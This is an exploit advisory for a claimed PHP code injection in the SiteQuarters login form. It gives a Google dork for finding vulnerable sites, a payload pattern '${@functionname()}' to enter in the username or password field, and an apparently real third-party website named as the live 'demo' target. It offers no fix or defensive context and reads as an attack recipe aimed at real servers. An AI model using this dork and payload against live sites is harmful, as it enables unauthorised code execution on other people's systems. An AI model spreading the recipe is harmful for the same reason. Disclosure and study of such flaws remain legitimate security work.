----------------------------------------------------------------
* Exploit Title: SiteQuarters PHP Code Injection
----------------------------------------------------------------
* Exploit Author: General Ghasemi
* Telegram @GeneralGhasemi
* Tested on: Windows 10
* tiredandalone855@gmail.com
----------------------------------------------------------------
* search google Dork : "Powered by SiteQuarters"
In The Post Method Of Login Page We can Run Any Php Code
Like This
${@functionname()}
Example:
Go to Demo Site: http://www.sjbmanagementinc.com/login.php
And Copy & Paste This Code in username or password field : ${@print(GeneralGhasemi)}
And Submit Login Form !
You See Page Print My Name!
* Demo: PHP Code Injection
http://www.sjbmanagementinc.com/login.php
----------------------------------------------------------------